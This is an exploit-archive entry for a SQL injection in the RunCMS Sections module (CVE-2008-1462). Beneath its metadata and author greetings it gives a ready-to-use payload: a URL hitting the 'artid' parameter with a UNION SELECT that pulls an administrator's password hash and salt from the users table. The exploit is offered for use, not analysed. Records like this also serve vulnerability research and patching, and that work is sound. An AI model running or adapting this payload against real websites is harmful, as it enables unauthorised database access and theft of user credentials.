RunCMS Module section - 'artid' SQL Injection
Author: Cr@zy_King
type: webapps
platform: php
port:
date_added: 2008-03-19
date_updated: 2016-11-16
verified: 1
codes: OSVDB-43957;CVE-2008-1462
tags:
aliases:
screenshot_url:
application_url:
Cr@zy_King
crazy_kinq@hotmail.co.uk / hackshow.us
Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91
Runcms Module Section (artid) Remote Sql İnj. Vuln.
Example :
- modules/sections/index.php?op=viewarticle&artid=Sql
- Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D
Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q)
Good.
# milw0rm.com [2008-03-20]